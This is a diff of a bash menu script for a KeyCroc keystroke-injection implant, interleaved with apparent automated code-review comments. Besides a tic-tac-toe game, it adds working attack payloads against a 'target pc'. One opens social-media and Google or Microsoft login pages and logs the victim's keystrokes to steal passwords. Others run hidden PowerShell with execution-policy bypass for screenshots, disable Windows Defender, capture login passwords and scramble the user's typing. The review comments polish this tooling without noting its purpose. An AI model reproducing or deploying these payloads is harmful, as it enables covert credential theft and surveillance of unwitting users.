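Review bot: `N_LINE` and `N_COLUMN` become local here, but the `RANDOM_U` and `RANDOM_D` assignments in `get_char` just below stay global, so the scoping this commit introduces is incomplete within the same function; `get_char` continues outside the hunk. Declaring `local RANDOM_U RANDOM_D` at the top of `get_char` would match the new lines. Each `$(echo $(( (RANDOM % 9) + 0)))` can also be written `$(( RANDOM % 9 ))`, which drops the subshell and the no-op `+ 0`.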
@@ -3362,30 +4638,162 @@ matrix() { matrix ; } ## -# - Pass time Menu +#----Pass time Game of tic-tac-toe ## -MenuTitle PASS TIME GAMES -MenuColor 1 CHESS ; echo -ne " ${clear}\n" -MenuColor 2 TETRIS ; echo -ne " ${clear}\n" -MenuColor 3 SNAKE ; echo -ne " ${clear}\n" -MenuColor 4 MATRIX ; echo -ne " ${clear}\n" -MenuColor 5 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +tac_toe() { +cell_w=10 +# horizontal line +line_seg="---------" +line=" ""$line_seg""|""$line_seg""|""$line_seg" +local reset="\033[0m" +local player_1_str=$green"Human"$reset +local player_2_str=$blue"Computer"$reset +local positions=(- - - - - - - - -) # initial positions +local player_one=true # player switch init +local game_finished=false # is the game finished +local stall=false # stall - if an invalid or empty move was input +# functions that draws instructions and board based on positions arr +function draw_board() { + clear + name=$1[@] # passing an array as argument + positions=("${!name}") +# first lines - instructions + echo -e "\n Q W E _|_|_\n A S D → | | \n Z X C ‾|‾|‾\n\n" +for (( row_id=1; row_id<=3; row_id++ ));do +# row + row=" " + empty_row=" " +for (( col_id=1; col_id<$(($cell_w*3)); col_id++ ));do +# column +# every 10th is a separator +if [[ $(( $col_id%$cell_w )) == 0 ]]; then + row=$row"|" + empty_row=$empty_row"|" +else +if [[ $(( $col_id%5 )) == 0 ]]; then # get the center of the tile + x=$(($row_id-1)) + y=$((($col_id - 5) / 10)) +if [[ $x == 0 ]]; then + what=${positions[$y]} +elif [[ $x == 1 ]]; then + what=${positions[(($y+3))]} +else + what=${positions[(($y+6))]} +fi +# if it's "-", it's empty +if [[ $what == "-" ]]; then what=" "; fi + if [[ $what == "X" ]] ; then # append to row + row=$row$green$what$reset + else + row=$row$blue$what$reset + fi + empty_row=$empty_row" " # advance empty row +else # not the center - space + row=$row" " + empty_row=$empty_row" " + fi +fi +done + echo -e "$empty_row""\n""$row""\n""$empty_row" # row is three lines high +if [[ 
$row_id != 3 ]]; then + echo -e "$line" +fi +done + echo -e "\n" +} +# function that displays the prompt based on turn, reads the input and advances the game +function read_move() { + positions_str=$(printf "%s" "${positions[@]}") + test_position_str $positions_str # finish the game if all postiions have been taken or a player has won +if [ "$game_finished" = false ] ; then + if [ "$stall" = false ] ; then + if [ "$player_one" = true ] ; then + prompt="Your move, "$player_1_str"?" + fi + else + stall=false + fi +if [ "$player_one" = true ] ; then + echo -e $prompt + read -d'' -s -n1 input # read input + index=10 # init with nonexistent +case $input in + q) index=0;; + a) index=3;; + z) index=6;; + w) index=1;; + s) index=4;; + x) index=7;; + e) index=2;; + d) index=5;; + c) index=8;; +esac +if [ "${positions["$index"]}" == "-" ]; then + positions["$index"]="X" + player_one=false +else + stall=true # prevent player switch +fi + else +# computer, choose your position! + set_next_avail_pos_index "O" + player_one=true +fi + init_game # reinit, because positions persist +fi +} +function init_game() { + draw_board positions + read_move +} +function end_game() { + game_finished=true + draw_board positions +} +function test_position_str() { + rows=${1:0:3}" "${1:3:3}" "${1:6:8} + cols=${1:0:1}${1:3:1}${1:6:1}" "${1:1:1}${1:4:1}${1:7:1}" "${1:2:1}${1:5:1}${1:8:1} + diagonals=${1:0:1}${1:4:1}${1:8:1}" "${1:2:1}${1:4:1}${1:6:1} +if [[ $rows =~ [X]{3,} || $cols =~ [X]{3,} || $diagonals =~ [X]{3,} ]]; then + end_game + echo -e $player_1_str" wins! \n" + return +fi +if [[ $rows =~ [O]{3,} || $cols =~ [O]{3,} || $diagonals =~ [O]{3,} ]]; then + end_game + echo -e $player_2_str" wins! \n" + return +fi +if [[ ! 
$positions_str =~ [-] ]]; then + end_game + echo -e "End with a "$pink"draw"$reset"\n" +fi +} +# get next available position and set it to value of argument +function set_next_avail_pos_index() { + available=() + for (( i = 0; i < ${#positions[@]}; i++ )); do +if [[ ${positions[$i]} == '-' ]]; then + available+=($i) +fi +done +rand=$(jot -r 1 0 $(( ${#available[@]}-1 ))) # random in range 0 to available_len +positions[${available[$rand]}]=$1 +} +init_game +} +## +#----Pass time Menu +## +MenuTitle PASS TIME GAMES ; MenuColor 19 1 CHESS ; MenuColor 19 2 TETRIS ; MenuColor 19 3 SNAKE ; MenuColor 19 4 MATRIX ; MenuColor 19 5 TIC-TAC-TOE ; MenuColor 19 6 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) chess_game ; pass_time ;; - 2) tetris_game ; pass_time ;; - 3) snake_game ; pass_time ;; - 4) matrix_effect ; pass_time ;; - 5) main_menu ;; - 0) exit 0 ;; - [bB]) menu_B ;; - *) invalid_entry ; pass_time ;; + 1) chess_game ; pass_time ;; 2) tetris_game ; pass_time ;; 3) snake_game ; pass_time ;; 4) matrix_effect ; pass_time ;; 5) tac_toe ; pass_time ;; 6) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; pass_time ;; esac } ## #----Windows defender ENABLE/DISABLE Function ## -windows_defender() { +function windows_defender() { clear ## #----Windows defender enable Function 
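Review bot: `set_next_avail_pos_index` picks the computer's move with `rand=$(jot -r 1 0 $(( ${#available[@]}-1 )))`, and `jot` is a BSD utility that a Debian-style image usually does not ship; if the device lacks it, `rand` comes back empty and the move is no longer random. Bash can do this without an external tool: `rand=$(( RANDOM % ${#available[@]} ))`. In `test_position_str` the third row is sliced as `${1:6:8}` while the other two rows use a length of 3, so `${1:6:3}` would be consistent. `cell_w`, `line_seg`, `line` and the variables set inside the helper functions are assigned without `local`, unlike `positions` and the other state declared at the top of `tac_toe`.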
@@ -3447,18 +4855,9 @@ defender_disable() { #----Windows defender ENABLE/DISABLE Menu ## if [ "$(OS_CHECK)" = WINDOWS ]; then -MenuTitle WINDOWS DEFENDER -MenuColor 1 ENABLE WINDOWS DEFENDER ; echo -ne " ${clear}\n" -MenuColor 2 DISABLE WINDOWS DEFENDER ; echo -ne " ${clear}\n" -MenuColor 3 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle WINDOWS DEFENDER ; MenuColor 25 1 ENABLE WINDOWS DEFENDER ; MenuColor 25 2 DISABLE WINDOWS DEFENDER ; MenuColor 25 3 RETURN TO MAIN MENU ; MenuEnd 28 case $m_a in - 1) defender_enable ; croc_pot_plus ;; - 2) defender_disable ; croc_pot_plus ;; - 3) main_menu ;; - 0) exit 0 ;; - [bB]) menu_B ;; - *) invalid_entry ; windows_defender ;; + 1) defender_enable ; croc_pot_plus ;; 2) defender_disable ; croc_pot_plus ;; 3) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; windows_defender ;; esac else echo -ne "\n\e[5m$(ColorRed '--The KeyCroc is not pluged into Windows pc This will not work on this OS')-->$(OS_CHECK)\n" @@ -3469,7 +4868,8 @@ fi ## function install_payloads() { clear - echo -ne "$(Info_Screen '-Select which Payload you would like to install')\n\n" + echo -ne "$(Info_Screen ' +-Select which Payload you would like to install')\n\n" ## #----Getonline Payload Function ## @@ -3478,7 +4878,8 @@ get_online_p() { local GETONLINE_WINDOWS=/root/udisk/payloads/Getonline_Windows.txt local GETONLINE_LINUX=/root/udisk/payloads/Getonline_Linux.txt local GETONLINE_RASPBERRY=/root/udisk/payloads/Getonline_Raspberry.txt - echo -ne "$(Info_Screen '-Payload Called GetOnline + echo -ne "$(Info_Screen ' +-Payload Called GetOnline -Connect automatically to target pc WIFI (Windows/Linux/Raspberry) -After install unplug and plug into target pc and type in below -getonline <-- MATCH word for windows 
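Review bot: The rewritten WINDOWS DEFENDER menu passes bare column widths (`MenuColor 25 1 …`, `MenuEnd 28`) and packs every `case` arm onto a single line, which makes the widths easy to get out of sync and the arms hard to review in later diffs. In the calls visible in this commit `MenuEnd` always receives the `MenuColor` width plus three, so a named value such as `local menu_w=25` with `MenuEnd $(( menu_w + 3 ))` would document that relationship, and one arm per line, as the removed code had, keeps changes reviewable; the same applies to the PASS TIME, INSTALL PAYLOADS, O.MG CABLE and CROC POT PLUS menus changed elsewhere in this commit. The selector should also be quoted, `case "$m_a" in`. `windows_defender` starts before this hunk.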
@@ -3560,7 +4961,8 @@ fi ## croc_unlock_p() { clear - echo -ne "$(Info_Screen '-Start by pressing GUI + l this will bring you to login screen + echo -ne "$(Info_Screen ' +-Start by pressing GUI + l this will bring you to login screen -This will forus the user to enter password and save to tools/Croc_Pot -This will create another payload called Croc_unlock_2.txt -Next time at login screen type in crocunlock 
@@ -3598,25 +5000,27 @@ fi ## wifi_setup_p() { clear - echo -ne "$(Info_Screen '-WITH THIS PAYLOAD YOU CAN CREATE MULTIPLE WIFI SETTING + echo -ne "$(Info_Screen ' +-WITH THIS PAYLOAD YOU CAN CREATE MULTIPLE WIFI SETTING -THE PURPOSE OF THIS PAYLOAD IS THAT IF YOU MOVE YOUR KEYCROC -AROUND TO DIFFERENT WIFI ACCESS POINTS -YOU CAN CREATE A PAYLOAD WITH MATCH WORD -CONNECT TO WIFI ACCESS POINT QUICKLY -BY TYPING YOUR MATCH WORD')\n" -while read_all ENTER A NAME FOR THIS PAYLOAD AND PRESS [ENTER]; do - local PAYLOAD_FOLDER=/root/udisk/payloads/${r_a}.txt +while read_all ENTER A NAME FOR THIS PAYLOAD AND PRESS [ENTER] ; local namep=${r_a}; do + local PAYLOAD_FOLDER=/root/udisk/payloads/${namep}.txt if [ -e "${PAYLOAD_FOLDER}" ]; then echo -ne "\n${LINE_}\e[5m$(ColorRed 'THIS PAYLOAD ALREADY EXISTS PLEASE CHOOSE A DIFFERENT NAME')${LINE_}\n" else touch ${PAYLOAD_FOLDER} - echo -ne "$(ColorBlue 'ENTER THE MATCH WORD YOU WOULD LIKE TO USE AND PRESS [ENTER]'): "; read USER_MATCH - echo -ne "$(ColorBlue 'ENTER THE SSID AND PRESS [ENTER]'): "; read USER_SSID - echo -ne "$(ColorBlue 'ENTER THE PASSWORD AND PRESS [ENTER]'): "; read WIFI_PASS + read_all ENTER THE MATCH WORD YOU WOULD LIKE TO USE AND PRESS [ENTER] ; local USER_MATCH=${r_a} + read_all ENTER THE SSID AND PRESS [ENTER] ; local USER_SSID=${r_a} + read_all ENTER THE PASSWORD AND PRESS [ENTER] ; local WIFI_PASS=${r_a} echo -ne "# Title: WIFI-SETUP\n# Description: Setup your wifi with adding your ssid and passwd\n# Author: spywill\n# Version: 1.3\n# Category: Key Croc\n#\n#\n MATCH ${USER_MATCH}\nLED SETUP\n\$(sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID ${USER_SSID}\\\nWIFI_PASS ${WIFI_PASS}\\\nSSH ENABLE' /root/udisk/config.txt)\nsleep 1\nLED FINISH" >> ${PAYLOAD_FOLDER} echo -ne "\n${red}***${clear}$(ColorGreen 'WIFI_SET PAYLOAD IS NOW INSTALLED CHECK KEYCROC PAYLOADS FOLDER')${red}***${clear}\n -$(Info_Screen '--UNPLUG THE KEYCROC AND PLUG BACK IN +$(Info_Screen ' +--UNPLUG THE KEYCROC AND PLUG BACK IN --TYPE IN YOUR 
MATCH WORD LED WILL LIGHT UP GREEN --THEN UNPLUG THE KEYCROC AND PLUG BACK IN --YOUR KEYCROC SHOULD NOW BE CONNECTED TO YOUR WIFI SETUP\n')\n" @@ -3629,7 +5033,8 @@ done ## quick_croc_pot () { clear - echo -ne "\n$(Info_Screen '-Create payload + echo -ne "\n$(Info_Screen ' +-Create payload -Quickly Start Croc_Pot without OS detection -This is for when you Already ran OS detection on target pc by crocpot -Match word is qspot')\n\n" @@ -3661,15 +5066,16 @@ fi ## screen_shot() { clear - echo -ne "$(Info_Screen '-Option to install Croc_Shot.txt payload this will take screenshot of Target pc + echo -ne "$(Info_Screen ' +-Option to install Croc_Shot.txt payload this will take screenshot of Target pc -To start the Croc_Shot payload type in crocshot --This will save to loot/Croc_pot/screenshot +-This will save to loot/Croc_Pot/screenshot -Option to take screenshot now -For this to work properly run Croc_Pot_Payload.txt first to get OS detection')\n\n" -if [ -d /root/udisk/loot/Croc_pot/screenshot ]; then +if [ -d /root/udisk/loot/Croc_Pot/screenshot ]; then LED B else - mkdir /root/udisk/loot/Croc_pot/screenshot + mkdir /root/udisk/loot/Croc_Pot/screenshot fi ## #----Screen Croc_Shot Payload install 
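Review bot: In `wifi_setup_p` the loop header is now `while read_all … ; local namep=${r_a}; do`, so the loop condition is the exit status of `local`, which is always 0, rather than that of `read_all`; the assignment belongs as the first statement of the loop body. `namep` then goes unchecked into `/root/udisk/payloads/${namep}.txt` and `touch ${PAYLOAD_FOLDER}` is unquoted, so a name containing spaces or `../` creates files somewhere else; a guard such as `[[ ${namep} =~ ^[A-Za-z0-9_-]+$ ]] || continue` together with `touch -- "${PAYLOAD_FOLDER}"` would contain that. The SSID and password are interpolated into an `echo -ne` string that becomes a sed script, so a quote or backslash in either value will probably break the generated payload, and the password is kept in clear text in the payload file, which deserves a comment. The loop's `done` lies outside this hunk.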
@@ -3682,10 +5088,10 @@ else case $r_a in [yY] | [yY][eE][sS]) echo -ne "# Title: CrocShot\n# Description: Take screenshot of PC and save to loot/Croc_Pot/screenshot\n# Author: spywill\n# Version: 1.1\n# Category: Key Croc\n\nMATCH crocshot\n\n#---> Check for save passwd run CrocUnlock first if not edit below\nif [ -e \"/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered\" ]; then\n PC_PW=\$(sed '\$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) -else\n#---> Edit LINUX-PC_PASSWD_HERE\n PC_PW=LINUX\nfi\n\nif [ -d /root/udisk/loot/Croc_pot/screenshot ]; then\n LED B\nelse\n mkdir /root/udisk/loot/Croc_pot/screenshot\nfi\n\nWINDS_SHOT=/root/udisk/tools/Croc_Pot/winds_shot.ps1\nOS_CHECK=\$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS.txt)\nHOST_CHECK=\$(sed -n 3p /root/udisk/tools/Croc_Pot/Croc_OS.txt)\n\nif [ \"\${OS_CHECK}\" = WINDOWS ]; then\n if [ -e \"\${WINDS_SHOT}\" ]; then +else\n#---> Edit LINUX-PC_PASSWD_HERE\n PC_PW=LINUX\nfi\n\nif [ -d /root/udisk/loot/Croc_Pot/screenshot ]; then\n LED B\nelse\n mkdir /root/udisk/loot/Croc_Pot/screenshot\nfi\n\nWINDS_SHOT=/root/udisk/tools/Croc_Pot/winds_shot.ps1\nOS_CHECK=\$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS.txt)\nHOST_CHECK=\$(sed -n 3p /root/udisk/tools/Croc_Pot/Croc_OS.txt)\n\nif [ \"\${OS_CHECK}\" = WINDOWS ]; then\n if [ -e \"\${WINDS_SHOT}\" ]; then ATTACKMODE HID STORAGE\n LED ATTACK\n Q GUI r\n sleep 1\n Q STRING \"powershell -nop -ex Bypass -w Hidden\"\n Q ENTER\n sleep 1\n Q STRING \"\\\$Croc = (gwmi win32_volume -f 'label=\\\"KeyCroc\\\"' | Select-Object -ExpandProperty DriveLetter)\" Q ENTER\n sleep 1\n Q STRING \".((gwmi win32_volume -f 'label=''KeyCroc''').Name+'tools\Croc_Pot\winds_shot.ps1')\"\n Q ENTER\n sleep 5\n Q STRING \"exit\"\n Q ENTER\n ATTACKMODE HID\n LED FINISH\nelse\n LED ATTACK -echo -ne \"\\\$outputFile = \\\"\\\$Croc\loot\Croc_pot\screenshot\\\\\\\\\\\$(get-date -format 'yyyy-mm-%d HH.mm.ss').png\\\"\\\n\nAdd-Type -AssemblyName System.Windows.Forms\\\nAdd-type 
-AssemblyName System.Drawing\\\n\n\\\$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen\\\n\\\$Width = \\\$Screen.Width\\\n +echo -ne \"\\\$outputFile = \\\"\\\$Croc\loot\Croc_Pot\screenshot\\\\\\\\\\\$(get-date -format 'yyyy-mm-%d HH.mm.ss').png\\\"\\\n\nAdd-Type -AssemblyName System.Windows.Forms\\\nAdd-type -AssemblyName System.Drawing\\\n\n\\\$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen\\\n\\\$Width = \\\$Screen.Width\\\n \\\$Height = \\\$Screen.Height\\\n\\\$Left = \\\$Screen.Left\\\n\\\$Top = \\\$Screen.Top\\\n\\\$screenshotImage = New-Object System.Drawing.Bitmap \\\$Width, \\\$Height\\\n\n\\\$graphicObject = [System.Drawing.Graphics]::FromImage(\\\$screenshotImage)\\\n\\\$graphicObject.CopyFromScreen(\\\$Left, \\\$Top, 0, 0, \\\$screenshotImage.Size)\\\n \\\$screenshotImage.Save(\\\$outputFile)\\\nWrite-Output \\\"Saved to:\\\"\\\nWrite-Output \\\$outputFile\\\nStart-Sleep -s 5\" >> \${WINDS_SHOT}\n Q GUI r\n sleep 1\n Q STRING \"powershell -nop -ex Bypass -w Hidden\"\n Q ENTER\n sleep 1\n Q STRING \"\\\$Croc = (gwmi win32_volume -f 'label=\\\"KeyCroc\\\"' | Select-Object -ExpandProperty DriveLetter)\" Q ENTER\n sleep 1\n Q STRING \".((gwmi win32_volume -f 'label=''KeyCroc''').Name+'tools\Croc_Pot\winds_shot.ps1')\"\n Q ENTER\n sleep 5\n Q STRING \"exit\"\n Q ENTER\n ATTACKMODE HID\n LED FINISH\n fi\nelse\ncase \$HOST_CHECK in\nraspberrypi)\n ATTACKMODE HID STORAGE\n LED ATTACK\n sleep 1\n Q ALT-F4\n Q GUI d\n sleep 1\n Q STRING \"LXTerminal\"\n Q ENTER\n Q ENTER 
@@ -3695,7 +5101,7 @@ echo -ne \"\\\$outputFile = \\\"\\\$Croc\loot\Croc_pot\screenshot\\\\\\\\\\\$(ge ATTACKMODE HID\n LED FINISH;;\n*)\n LED ATTACK\n Q ALT F2\n sleep 1\n Q STRING \"mate-terminal\"\n Q ENTER\n sleep 1\n Q STRING \"sudo mkdir /media/\\\$(whoami)/KeyCroc/; sudo mount /dev/sdd /media/\\\$(whoami)/KeyCroc/ -o rw,users,umask=0; sudo chmod 777 /media/\\\$(whoami)/KeyCroc/\" Q ENTER\n sleep 1\n Q STRING \"\${PC_PW}\"\n Q ENTER\n sleep 1\n Q STRING \"sleep 2; import -window root /media/\\\$(whoami)/KeyCroc/loot/Croc_Pot/screenshot/\$(date '+%Y-%m-%d.%H.%M.%S').png; sudo umount /media/\\\$(whoami)/KeyCroc/; sudo rmdir /media/\\\$(whoami)/KeyCroc/; exit\"\n Q ENTER\n Q ALT-TAB\n sleep 10\n ATTACKMODE HID\n LED FINISH;;\n esac\nfi" >> ${Croc_Shot} ;; [nN] | [nN][oO]) - echo -ne "$(ColorYellow 'Maybe next time')\n";; + echo -ne "$(ColorYellow 'Maybe next time')\n" ;; *) invalid_entry ; screen_shot ;; esac @@ -3725,7 +5131,7 @@ case $r_a in Q ENTER ATTACKMODE HID else - echo -ne "\$outputFile = \"\$Croc\loot\Croc_pot\screenshot\\\$(get-date -format 'yyyy-mm-%d HH.mm.ss').png\"\n + echo -ne "\$outputFile = \"\$Croc\loot\Croc_Pot\screenshot\\\$(get-date -format 'yyyy-mm-%d HH.mm.ss').png\"\n Add-Type -AssemblyName System.Windows.Forms\nAdd-type -AssemblyName System.Drawing\n \$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen\n\$Width = \$Screen.Width\n \$Height = \$Screen.Height\n\$Left = \$Screen.Left\n\$Top = \$Screen.Top\n\$screenshotImage = New-Object System.Drawing.Bitmap \$Width, \$Height\n 
@@ -3806,55 +5212,369 @@ fi ;; esac } ## +#----Croc_Bite payload social media account passwd Attempt +## +croc_bite() { + clear + echo -ne "$(Info_Screen ' +-Attempt to retrieve target pc Social media account passwd +-Create a payload called Croc_Bite.txt MATCH word will be Social media name +-This will open target pc web browser and open up Social media login page +-If successful passwd saved at /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered +-Ensure to run Croc_Pot_Payload.txt first')\n" + echo -ne "$(ColorRed '--THIS PAYLOAD IS RELYING ON THE ENTER KEY TO BE PRESSED\n +--AFTER THE USER HAS ENTER THE PASSWORD\n')" +## +#----check for existing Croc_Bite payload +## +if [ -e "/root/udisk/payloads/Croc_Bite.txt" ]; then + echo -ne "${yellow}Found existing Croc_Bite payload${clear}\n" + cat /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered + echo -ne "${LINE}\n" + cat /root/udisk/payloads/Croc_Bite.txt + echo -ne "\n" + read_all USE EXISTING CROC_BITE PAYLOAD Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + echo -ne "${yellow}Keeping existing Croc_Bite payload${clear}" + install_payloads ;; +[nN] | [nN][oO]) + echo -ne "${red}Removing existing Croc_Bite payload${clear}" + rm /root/udisk/tools/Croc_Pot/Croc_Bite.txt /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered /root/udisk/payloads/Croc_Bite.txt ;; +*) + invalid_entry ; croc_bite ;; +esac +else + echo -ne "${yellow}No existing Croc_Bite payload${clear}\n" +fi +## +#----Create Croc_Bite payload +## +bite_payload() { + echo -ne "# Title: Croc_Bite\n# Description: Social media account passwd attempt this will open target pc web browser and open login page\n# Author: Spywill\n# Version: 1.0\n# Category: Key Croc\n\nMATCH ${1}\n +if [ -e \"/root/udisk/tools/Croc_Pot/Croc_OS.txt\" ]; then\n case \$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS.txt) in\nWINDOWS)\n Q GUI d\n Q GUI r\n sleep 1\n Q STRING \"powershell -NoP -NonI -W Hidden -Exec Bypass\"\n Q ENTER + sleep 2\n Q STRING \"Start-Process ${@:2}; 
exit\"\n Q ENTER\nSAVEKEYS /root/udisk/tools/Croc_Pot/Croc_Bite.txt UNTIL ENTER\necho \"${1}\" >> /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered\n LED ATTACK ;;\nLINUX)\n case \$(sed -n 3p /root/udisk/tools/Croc_Pot/Croc_OS.txt) in +raspberrypi)\n Q GUI d\n Q CONTROL-ALT-F1\n sleep 1\n Q STRING \"cp -u /usr/share/applications/lxterminal.* /home/\\\$(whoami)/Desktop\"\n Q ENTER\n Q ALT-F7\n sleep 5\n Q STRING \"LXTerminal\"\n Q ENTER\n Q ENTER\n sleep 1\n Q STRING \"gio open ${@:2}; exit\" + Q ENTER\nSAVEKEYS /root/udisk/tools/Croc_Pot/Croc_Bite.txt UNTIL ENTER\necho \"${1}\" >> /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered\n LED ATTACK ;;\nparrot)\n Q ALT F2\n sleep 1\n Q STRING \"mate-terminal\"\n Q ENTER\n sleep 1\n Q STRING \"gio open ${@:2}; exit\" + Q ENTER\nSAVEKEYS /root/udisk/tools/Croc_Pot/Croc_Bite.txt UNTIL ENTER\necho \"${1}\" >> /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered\n LED ATTACK ;;\n*)\n Q ALT F2\n sleep 1\n Q STRING \"xterm\"\n Q ENTER\n sleep 1\n Q STRING \"gio open ${@:2}; exit\" + Q ENTER\nSAVEKEYS /root/udisk/tools/Croc_Pot/Croc_Bite.txt UNTIL ENTER\necho \"${1}\" >> /root/udisk/tools/Croc_Pot/Croc_Bite.txt.filtered\n LED ATTACK ;;\n esac\n esac\nelse\n LED R\nfi\nLED FINISH" >> /root/udisk/payloads/Croc_Bite.txt + echo -ne "${green}-Croc_Bite payload install check payloads folder\n + unplug keycroc plug back in type in match word ${1}${clear}\n" +} +## +#----Croc_Bite menu +## +MenuTitle CROC BITE MENU ; MenuColor 19 1 FACEBOOK ATTEMPT ; MenuColor 19 2 INSTAGRAM ATTEMPT ; MenuColor 19 3 TWITTER ATTEMPT ; MenuColor 19 4 TIKTOK ATTEMPT +MenuColor 19 5 MESSENGER ATTEMPT ; MenuColor 19 6 GOOGLE ATTEMPT ; MenuColor 19 7 MICROSOFT ATTEMPT ; MenuColor 19 8 RETURN TO MAIN MENU ; MenuEnd 22 + case $m_a in + 1) bite_payload facebook https://www.facebook.com/login/ ; install_payloads ;; 2) bite_payload instagram https://www.instagram.com/accounts/login/ ; install_payloads ;; 3) bite_payload twitter https://twitter.com/login/ ; 
install_payloads ;; 4) bite_payload tiktok https://careers.tiktok.com/login ; install_payloads ;; + 5) bite_payload messenger https://www.messenger.com/login/ ; install_payloads ;; 6) bite_payload google https://accounts.google.com/signin ; install_payloads ;; 7) bite_payload microsoft https://login.microsoftonline.com/ ; install_payloads ;; + 8) main_menu ;; 0) exit 0 ;; [bB]) install_payloads ;; *) invalid_entry ; reboot_shutdown ;; + esac +} +## +#----Start web site on target pc web browser +## +web_site() { + clear + echo -ne "$(Info_Screen ' +-Enter web site name example https://www.google.com +-This will open target pc default web browser and start website')\n\n" +read_all START WEB SITE Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + read_all ENTER WEB SITE NAME AND PRESS [ENTER] + start_web ${r_a} ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; web_site ;; +esac +} +## +#----Keep target pc screen from sleeping +## +screen_on() { + clear + echo -ne "$(Info_Screen ' +-Keep Target pc screen from going to sleeping +-This will QUACK spacebar every 60 sec and backspace +-press CTRL + c to stop +-MATCH word is nosleeping')\n\n" +local No_sleep=/root/udisk/payloads/No_Sleeping.txt +if [ -e "${No_sleep}" ]; then + echo -ne "\n$(ColorGreen 'No_Sleeping PAYLOAD IS INSTALLED CHECK PAYLOADS FOLDER')\n" +else + read_all INSTALL NO_SLEEPING PAYLOAD Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + echo -ne "# Title: No sleeping\n# Description: Keep Target pc screen from going to sleeping\n# Author: spywill\n# Version: 1.0\n# Category: Key Croc +#\n#\nMATCH nosleeping\nLED ATTACK\nQ GUI d\nwhile : ;do\nQ KEYCODE 00,00,2c\nQ BACKSPACE\nsleep 60\ndone" >> ${No_sleep} + echo -ne "\n$(ColorGreen 'No_Sleeping PAYLOAD IS NOW INSTALLED CHECK PAYLOADS FOLDER')\n" ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; screen_on ;; + esac +fi +read_all KEEP SCREEN ON Y/N 
AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + Q GUI d + while : ;do + printf -v now "%(%s)T" -1 + read -t $(( 60-(now%60) )) K_L + Q KEYCODE 00,00,2c + Q BACKSPACE + done ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; screen_on ;; +esac +} +## +#----Replace user text with random characters payload +## +text_replace() { + clear + echo -ne "$(Info_Screen ' +-Replace user text with random characters +-This will install Croc_replace.txt payload in payloads folder +-Enter the amount of characters to replace +-NOTE: After payload has ran this will insert # +infront of match to disable Croc_replace.txt payload +-Restart payload enter arming mode and remove #')\n\n" + local croc_replace=/root/udisk/payloads/Croc_replace.txt +if [ -e "${croc_replace}" ]; then + echo -ne "\n$(ColorGreen 'Croc_replace PAYLOAD IS INSTALLED CHECK PAYLOADS FOLDER')\n" +else + read_all INSTALL CROC_REPLACE PAYLOAD Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + read_all ENTER NUMBER OF CHARACTER TO REPLACE AND PRESS [ENTER] + echo -ne "# Title: Croc_replace\n# Description: Replace user text with random characters enter a number for the amount to change\n# NOTE: TO restart this payload enter arming mode and remove the # in front of match +# Author: spywill\n# Version: 1.0\n# Category: Key Croc\n#\n#\nMATCH (?i)[0-9 a-z]\n\n#--->Enter the amount of characters to change here\nchar=${r_a}\n\necho -n \"a\" >> /tmp/text_replace.txt\nvar=\$(< /tmp/text_replace.txt)\n +if [[ \${#var} -gt \${char} ]] ; then\n LED OFF\n DISABLE_PAYLOAD payloads/Croc_replace.txt\n sed -i '9s/^/#/' /root/udisk/payloads/Croc_replace.txt\n RELOAD_PAYLOADS\nelse\n LED B\n Q BACKSPACE\n Q STRING \"\$(< /dev/urandom tr -cd '[:graph:]' | tr -d '\\\\\' | head -c 1)\" + LED R\nfi" >> ${croc_replace} + echo -ne "\n$(ColorGreen 'Croc_replace PAYLOAD IS NOW INSTALLED CHECK PAYLOADS FOLDER')\n" ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" 
;; +*) + invalid_entry ; text_replace ;; + esac +fi +} +## #----Install Payloads Menu ## -MenuTitle INSTALL PAYLOADS MENU -MenuColor 1 GETONLINE PAYLOAD ; echo -ne " ${clear}\n" -MenuColor 2 CROCUNLOCK PAYLOAD ; echo -ne " ${clear}\n" -MenuColor 3 WIFI SETUP PAYLOAD ; echo -ne " ${clear}\n" -MenuColor 4 QUICK START CROC_POT ; echo -ne " ${clear}\n" -MenuColor 5 CROCSHOT PAYLOAD ; echo -ne " ${clear}\n" -MenuColor 6 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle INSTALL PAYLOADS MENU ; MenuColor 21 1 GETONLINE PAYLOAD ; MenuColor 21 2 CROCUNLOCK PAYLOAD ; MenuColor 21 3 WIFI SETUP PAYLOAD ; MenuColor 21 4 QUICK START CROC_POT +MenuColor 21 5 CROCSHOT PAYLOAD ; MenuColor 21 6 CROC_BITE PAYLOAD ; MenuColor 21 7 OPEN WEB SITE ; MenuColor 21 8 KEEP SCREEN ON ; MenuColor 21 9 REPLACE USER TEXT ; MenuColor 20 10 RETURN TO MAIN MENU ; MenuEnd 24 case 